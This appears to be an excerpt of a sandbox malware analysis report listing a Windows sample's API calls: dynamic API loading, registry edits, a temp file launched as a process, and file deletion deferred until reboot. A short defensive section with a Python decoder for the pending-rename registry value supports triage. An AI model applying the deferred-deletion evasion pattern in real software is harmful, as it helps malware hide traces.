• Instruction Fuzzy Hash: 6C31A032F00229ABDF108FA4EE45EEE7B78EB04315F550076E901E3290D7759E41DBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: CountTick
• String ID:
• API String ID: 536389180-0
• Opcode ID: 6c9193b7122c9ada05db2bf893685bdb1e040ed9adec1d3d207f007b4c2f18bb
• Instruction ID: 8ac1f8066ba04423f4662e4113d208e2f1450d097528ad0d5c8686e1bb647505
• Opcode Fuzzy Hash: 6c9193b7122c9ada05db2bf893685bdb1e040ed9adec1d3d207f007b4c2f18bb
• Instruction Fuzzy Hash: 56F0A9319283B19F9704EF39C94518BBBE5EBC4250F54CD2EA895C3214E378D915DF92
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1dbbee3704f12433d065c0b315258c4b07da05294b99e7abcb0b3c4fa3fe7de6
• Instruction ID: 8b5a2351a7d1e8d8b8448e22e26b40c83a0be625b2b6ea0dbd06899092a7e69e
• Opcode Fuzzy Hash: 1dbbee3704f12433d065c0b315258c4b07da05294b99e7abcb0b3c4fa3fe7de6
• Instruction Fuzzy Hash: 74A16E762043808FE314CF35EC927967BE6ABA9700F14652EE995873B1D3F78448CB59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: MutexObjectReleaseSingleWaitlstrlen
• String ID: M$M
• API String ID: 2109015423-2122717962
• Opcode ID: 7911a5574d635876bba3228f93589202df659d67aa1a0e78d2affb198733790a
• Instruction ID: 65662130b59962f93e7e6451055683d101b0e1da79cd26758f1cd863abbc9b8b
• Opcode Fuzzy Hash: 7911a5574d635876bba3228f93589202df659d67aa1a0e78d2affb198733790a
• Instruction Fuzzy Hash: 9A12F4B15083408FD704DF24D891AEBBBE9EF99304F04596EF885873A2C775D885CB9A
APIs
• GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0042C8D2
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d9c418d2c5127a8e192e8e4372b48e11d0a1081b729fc00d09ab3506c0033e68
• Instruction ID: e4f55cae686a28aa76e175452713597d1e28f11c85c6f89cf701b194585c12d8
• Opcode Fuzzy Hash: d9c418d2c5127a8e192e8e4372b48e11d0a1081b729fc00d09ab3506c0033e68
• Instruction Fuzzy Hash: 0AE02230B00208EBDB00EBB1EC42ADD37B8AB08318F8041A6F100D61D1DB70D600C71D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID:
• String ID: 8
• API String ID: 0-4194326291
• Opcode ID: 814331b60dd9f30dc3f595824217278f4f2d009bcc9f76483a00ba86c43ce653
• Instruction ID: 26635683ad8bc6e3c89de0789139caf88a326a2f6bde127323b4d45711ec2293
• Opcode Fuzzy Hash: 814331b60dd9f30dc3f595824217278f4f2d009bcc9f76483a00ba86c43ce653
• Instruction Fuzzy Hash: 239136701083914BD710CE2895907AFBBE1ABD6300F45593EE8D26B392D27CD95A8B4B
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000272CC), ref: 0042731F
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: c295cc2e9cb841625434bd69c2be57921d73015333ff570b30f8570a734b9d5d
• Instruction ID: 91d239ce8c3ec9bc864000ee122172ece4c8541e5da3e4e88b6e0ad87dd54bef
• Opcode Fuzzy Hash: c295cc2e9cb841625434bd69c2be57921d73015333ff570b30f8570a734b9d5d
• Instruction Fuzzy Hash: 74A012743022008BD3149F306E0501039A09E002013411075E500C1230D7700004D519
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 00427333
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 2ab6f6718f042291c8c0e3391e57a3836615d8269b254a55ffda52550e9e3c4b
• Instruction ID: 8169098ac00662e5d218563eb379ef12e921e05fa147c2ad6ec4e4497947ff53
• Opcode Fuzzy Hash: 2ab6f6718f042291c8c0e3391e57a3836615d8269b254a55ffda52550e9e3c4b
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick
                                                                  • String ID: %c%c%c%c%c
                                                                  • API String ID: 536389180-1277064353
                                                                  • Opcode ID: daa91acc0e97e6ab900b670a7356a182af056bc5419cf5b0c7a93d0f2983e8bb
                                                                  • Instruction ID: 4dc9e3df276925cb3a034685040d612f820b75638e41f6e52d904118c8461c86
                                                                  • Opcode Fuzzy Hash: daa91acc0e97e6ab900b670a7356a182af056bc5419cf5b0c7a93d0f2983e8bb
                                                                  • Instruction Fuzzy Hash: CD5105706083409BD304EB26C9C2B9FB6E7AFC9714F04CA3FB159672D1DABC94448B5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4374541c7480c9de861eca13ad143b888a03e34fd4b500e75caf825a3247e9c9
                                                                  • Instruction ID: 3cdbe674e5470716266b0416ac65ed08902d21a00894794e9fc3ed7962c02048
                                                                  • Opcode Fuzzy Hash: 4374541c7480c9de861eca13ad143b888a03e34fd4b500e75caf825a3247e9c9
                                                                  • Instruction Fuzzy Hash: F721D632A00614DFCB14DF69D8809ABB7A5FF45310B8A80A9E915CB286E734F915CBF0
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,0000006B), ref: 0041D4A3
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041D53F
                                                                  • GetProcAddress.KERNEL32(00000000,0000009A), ref: 0041D637
                                                                  • GetProcAddress.KERNEL32(00000000,000000A5), ref: 0041D6A1
                                                                  • GetProcAddress.KERNEL32(00000000,000000EA), ref: 0041D718
                                                                  • GetProcAddress.KERNEL32(00000000,00000088), ref: 0041D80A
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D967
                                                                  • LoadLibraryA.KERNEL32(00000040), ref: 0041D9FF
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $$$$$$&$&$+$/$1$1$2$6$6$7$8$9$9$:$;$<$<$>$@$A$B$H$H$H$I$I$I$J$J$L$L$L$M$M$N$S$S$S$S$T$T$W$W$X$X$_$`$`$`$`$e$g$g$g$h$h$i$l$m$o$p$q$r$t$t$u$v$w$w$x$x$y$|$~
                                                                  • API String ID: 2238633743-3939626055
                                                                  • Opcode ID: c0813e0e13b3bdf5361ae911ad3d7297fecab97c2126bead805d02d7372984c4
                                                                  • Instruction ID: 4ea2d180e8293730c515bf7f31d434ed5d52511cef3b66f0afd499666270cbed
                                                                  • Opcode Fuzzy Hash: c0813e0e13b3bdf5361ae911ad3d7297fecab97c2126bead805d02d7372984c4
                                                                  • Instruction Fuzzy Hash: 0452A72000CBC2C9D332D27C584879FBFD11BA7228F584B9DE1F95A2E2D7A68146C767
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A5,00000000,00000001,00000001,00000000,00000000,00000001,00000001), ref: 00414E44
                                                                  • CreateThread.KERNEL32(00000000,00000000,00401260,?,00000000,?), ref: 00414E6E
                                                                  • CreateThread.KERNEL32(00000000,00000000,004191C0,?,00000000,?), ref: 00414EF5
                                                                  • WaitForMultipleObjects.KERNEL32(0000000A,?,00000001,000000FF,?,00000001), ref: 00414F35
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Thread$EventMultipleObjectsWait
                                                                  • String ID: $$$$$%$&$&$&$($($($($($($)$)$*$*$*$*$*$+$+$,$,$-$-$-$.$/$1$5$6$7$8$9$>$@$@$A$C$D$E$E$H$L$S$V$X$Z$Z$[$\$c$g$k$l$p$q$v$v$w$z$}$}
                                                                  • API String ID: 235807246-2775756417
                                                                  • Opcode ID: a6afbd8884c598ed69450247ac07e46a6a6b8b414b765670315f290819311f0a
                                                                  • Instruction ID: b6b29a9a05f7405d77ba8641239e9328c4f6afcdac9f5fec8354e56a50ce38c0
                                                                  • Opcode Fuzzy Hash: a6afbd8884c598ed69450247ac07e46a6a6b8b414b765670315f290819311f0a
                                                                  • Instruction Fuzzy Hash: A522283110C7C18AE332C7689859BDFBFD45BA7318F484A9EE1E95B2D2C6B90109C767
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00413420
                                                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 00413451
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041345C
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413472
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041348A
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 0041357C
                                                                  • DeleteFileA.KERNEL32(?), ref: 0041358C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004136BF
                                                                  • DeleteFileA.KERNEL32(?), ref: 004136C9
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004137F1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004137FB
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041380C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000078,?,00000104), ref: 004138E6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004138F0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004139C6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004139D0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00413AA6
                                                                  • DeleteFileA.KERNEL32(?), ref: 00413AB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$EnvironmentExpandStrings$Move$CloseModuleNameOpenValue
                                                                  • String ID: '$'$'$'$'$'$0$0$0$0$0$0$4$4$4$4$4$4$:$:$:$:$:$<$F$F$Y$Y$Y$Y$Y$^$e$h$m$m$r$s$t$t$t$x$x$x$x$x$z$z$z$z$z$z${${${${${${rest
                                                                  • API String ID: 3238871166-1982327307
                                                                  • Opcode ID: eb28d1edef8d5a0ebcf80e1393b2c75a925ba66498ea7eb4a4f4807419b03660
                                                                  • Instruction ID: 8932c8d423f86795222f4535f9e39ef289d62bf3872af0266dd33df7fd326858
                                                                  • Opcode Fuzzy Hash: eb28d1edef8d5a0ebcf80e1393b2c75a925ba66498ea7eb4a4f4807419b03660
                                                                  • Instruction Fuzzy Hash: 5042961110D7C2C9D332D67C984878FBFD51BA7228F484F8DE1E95B2E2C6A98249C767
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00422D24
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422D2D
                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00422D38
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422D3B
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?), ref: 00422D51
                                                                  • RegQueryValueExA.ADVAPI32(?,0000003B,00000000,00000000,00000000,?), ref: 00422D6E
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00422D7D
                                                                  • _strncpy.LIBCMT ref: 00422DD1
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,00000054), ref: 00422E90
                                                                  • RegCloseKey.ADVAPI32(?,?,00000054), ref: 00422EA7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000054), ref: 00422EB6
                                                                  • HeapFree.KERNEL32(00000000,?,00000054), ref: 00422EBF
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000054), ref: 00422EC4
                                                                  • HeapFree.KERNEL32(00000000,?,00000054), ref: 00422EC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocCloseFreeValue$OpenQuery_strncpy
                                                                  • String ID: !$"$#$%$'$'$)$,$,$,$.$/$1$4$4$4$6$8$9$;$<$?$B$E$F$G$G$K$N$N$P$P$Q$Q$R$S$S$T$T$W$W$X$Z$\$]$b$c$c$e$g$t$u$v$x$x$x${$}$~
                                                                  • API String ID: 3932281191-2427493838
                                                                  • Opcode ID: 1e99909b19aa585da5ead2d891978beee004937c050dea2f45ef4ffdaa32fc77
                                                                  • Instruction ID: 4784c4b2e2af174b486d3fa0099c06b4624002471a15ad2e25fd25ecae521a18
                                                                  • Opcode Fuzzy Hash: 1e99909b19aa585da5ead2d891978beee004937c050dea2f45ef4ffdaa32fc77
                                                                  • Instruction Fuzzy Hash: 8002182120C7C19ED332C63C994879BBFD15BA7218F484A9DE1E85B3D2C7B98509C76B
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00422800
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00422807
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,74DF3310), ref: 00422821
                                                                  • RegQueryValueExA.ADVAPI32(?,00000054,00000000,00000000,00000000,?), ref: 0042283E
                                                                  • RegCloseKey.ADVAPI32(74DF3310), ref: 0042284D
                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,00000002,?,0000005C), ref: 004228DF
                                                                  • RegCloseKey.ADVAPI32(?,?,0000005C), ref: 004228F0
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0000005C), ref: 004228F9
                                                                  • HeapFree.KERNEL32(00000000,?,0000005C), ref: 00422900
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseProcessValue$AllocFreeOpenQuery
                                                                  • String ID: !$"$%$&$'$($)$/$1$1$5$8$:$;$>$>$A$D$E$G$H$K$K$L$N$P$Q$R$R$S$S$S$T$Z$Z$\$]$b$b$d$d$f$g$j$j$m$p$q$s$v${${$~$~
                                                                  • API String ID: 1874932168-1336078793
                                                                  • Opcode ID: 437fdbd436a05d19afb7f5867172574a4622868046f25b3dfc0edf86c844fae6
                                                                  • Instruction ID: bbaaf71f1dd44b42d8da240f366e0f2ce8dd36e8536a405cef6b64a909e2b2a5
                                                                  • Opcode Fuzzy Hash: 437fdbd436a05d19afb7f5867172574a4622868046f25b3dfc0edf86c844fae6
                                                                  • Instruction Fuzzy Hash: FBF1D62110C7C18DD332C67C984879BBFD15BA7228F484A9DE1E84B3E3C7A98549C767
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004136BF
                                                                  • DeleteFileA.KERNEL32(?), ref: 004136C9
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004137F1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004137FB
                                                                  • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0041380C
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000078,?,00000104), ref: 004138E6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004138F0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004139C6
                                                                  • DeleteFileA.KERNEL32(?), ref: 004139D0
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00413AA6
                                                                  • DeleteFileA.KERNEL32(?), ref: 00413AB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$DeleteEnvironmentExpandStrings$Move
                                                                  • String ID: '$'$'$'$0$0$0$0$4$4$4$4$:$:$:$:$<$F$F$Y$Y$Y$Y$^$h$m$m$t$t$x$x$x$x$z$z$z$z${${${${
                                                                  • API String ID: 1654938343-3628898711
                                                                  • Opcode ID: e9b6a916e27b3cf29a9a65f7cf79a47c5e7352404d4b86a79d6f692a307431ad
                                                                  • Instruction ID: ffda26696a7c03ebfd7e55884b4f9ff3b6aa4abcfec39c9677275916e54d1851
                                                                  • Opcode Fuzzy Hash: e9b6a916e27b3cf29a9a65f7cf79a47c5e7352404d4b86a79d6f692a307431ad
                                                                  • Instruction Fuzzy Hash: 05D1A91100C7C289D322D67C945878FFFD51BE7228F484F9DE1E99A2D2C6AA824DC767
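The listing above (and the GetSystemDirectoryA variant further down, from ref 00423155 onwards) calls MoveFileExA with a NULL new name (the 00000000 second argument) and MOVEFILE_DELAY_UNTIL_REBOOT. That call does not touch the file now: it appends a pair of strings to the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, and the Session Manager deletes (empty destination) or moves the file on the next boot, after the sample has exited and after most host-based scanners have stopped watching it. That value is the artefact to pull in triage. The decoder below is an added example, not code from the sample or from Joe Sandbox; the blob it parses is constructed here, and the paths in it are illustrative only, since the report shows the ExpandEnvironmentStringsA arguments as pointers, not as expanded paths. The one thing worth knowing about the layout: an empty destination is a legitimate element of this value, so a generic REG_MULTI_SZ splitter that stops at the first double NUL silently truncates the list after the first delete.

```python
"""Decode the PendingFileRenameOperations value that
MoveFileEx(..., MOVEFILE_DELAY_UNTIL_REBOOT) appends to.

Added example for this report; not code from the sample or from Joe Sandbox.
SAMPLE_BLOB is constructed below to illustrate the layout; the real value lives
under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager.
"""
from typing import Dict, List, Tuple

NT_PREFIX = "\\??\\"   # MoveFileEx records Win32 paths in this NT object-manager form


def _win32_path(nt_path: str) -> str:
    """Strip the \\??\\ prefix so the path reads as the Win32 path the sample used."""
    return nt_path[len(NT_PREFIX):] if nt_path.startswith(NT_PREFIX) else nt_path


def encode_pending_ops(ops: List[Tuple[str, str]]) -> bytes:
    """Build the value as MoveFileEx does: NUL-terminated (source, destination) pairs,
    UTF-16LE, plus one extra NUL as the REG_MULTI_SZ terminator.  An empty destination
    means 'delete at boot'; a leading '!' on the destination means the target may be
    overwritten (MOVEFILE_REPLACE_EXISTING)."""
    text = "".join(f"{src}\x00{dst}\x00" for src, dst in ops) + "\x00"
    return text.encode("utf-16-le")


def decode_pending_ops(raw: bytes) -> List[Dict[str, str]]:
    """Parse the blob the way the Session Manager consumes it: pairs of NUL-terminated
    strings, where an empty destination is a real element and must not be treated as
    the end-of-list marker."""
    text = raw.decode("utf-16-le")
    if not text.endswith("\x00"):
        raise ValueError("missing REG_MULTI_SZ terminator")
    fields = text[:-1].split("\x00")   # drop the terminator, then split on element NULs
    fields.pop()                       # every element ends in NUL, so the last split item is empty
    if len(fields) % 2:
        raise ValueError("odd number of strings: value is not well-formed pairs")
    ops = []
    for src, dst in zip(fields[0::2], fields[1::2]):
        if dst == "":
            action = "delete"
        elif dst.startswith("!"):
            action, dst = "replace", dst[1:]
        else:
            action = "move"
        ops.append({"action": action,
                    "source": _win32_path(src),
                    "destination": _win32_path(dst)})
    return ops


def deletions_under(ops: List[Dict[str, str]], prefixes: List[str]) -> List[str]:
    """Files queued for deletion whose path starts with one of `prefixes`
    (case-insensitive), e.g. a dropper's own copy in the system directory."""
    hits = []
    for op in ops:
        if op["action"] != "delete":
            continue
        if any(op["source"].lower().startswith(p.lower()) for p in prefixes):
            hits.append(op["source"])
    return hits


# Constructed sample mirroring the delete-and-move pattern in the listing; the
# paths are invented for illustration and are not artefacts from the report.
SAMPLE_BLOB = encode_pending_ops([
    ("\\??\\C:\\Users\\victim\\AppData\\Local\\Temp\\tmpA1B2.tmp", ""),
    ("\\??\\C:\\Windows\\System32\\oldcopy.exe", ""),
    ("\\??\\C:\\Windows\\Temp\\stage.bin", "!\\??\\C:\\Windows\\System32\\stage.dll"),
])

if __name__ == "__main__":
    ops = decode_pending_ops(SAMPLE_BLOB)
    for op in ops:
        print(op)
    print("system32 deletions:", deletions_under(ops, ["C:\\Windows\\System32"]))
```

On a live or imaged host the raw bytes come from the value's REG_MULTI_SZ data (for example via `winreg.QueryValueEx` or an offline hive parser); feed them to `decode_pending_ops` unchanged, because re-splitting them with a generic MULTI_SZ helper first is exactly the truncation the decoder avoids.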
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00080000), ref: 00401BC5
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401BCC
                                                                  • Sleep.KERNEL32(000493E0), ref: 00401C28
                                                                  • Sleep.KERNEL32(000003E8), ref: 00401C4B
                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 00401D10
                                                                  • GetTempFileNameA.KERNEL32(?,0042E290,00000000,?), ref: 00401D2D
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00401D5A
                                                                  • WriteFile.KERNEL32(00000000,00000007,?,?,00000000), ref: 00401D7B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401D93
                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401DD0
                                                                  • CloseHandle.KERNEL32(?), ref: 00401DDF
                                                                  • CloseHandle.KERNEL32(?), ref: 00401DED
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401E5C
                                                                  • HeapFree.KERNEL32(00000000), ref: 00401E63
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseFileHandleProcess$CreateSleepTemp$AllocFreeNamePathWrite
                                                                  • String ID: '$+$,$-$0$2$4$:$;$@$A$B$C$D$I$K$N$P$S$T$U$Y$\$^$c$e$p$r$v$y$z${$}
                                                                  • API String ID: 633426975-1940365277
                                                                  • Opcode ID: 69dfe3e2ad568bfae82bd1608e3d8c6f51c46d62c4de821528446c51c84c10da
                                                                  • Instruction ID: e6c0c0694c561dc4f23d5baa3025b2d471003fa36f15fb022360e7d662cf5cb9
                                                                  • Opcode Fuzzy Hash: 69dfe3e2ad568bfae82bd1608e3d8c6f51c46d62c4de821528446c51c84c10da
                                                                  • Instruction Fuzzy Hash: B7E16B3014C7C18EE321CB789848B9BBFD46BA6324F185A5DF2E48B2E2C7B58405D767
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041DC17
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DCDE
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DDB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
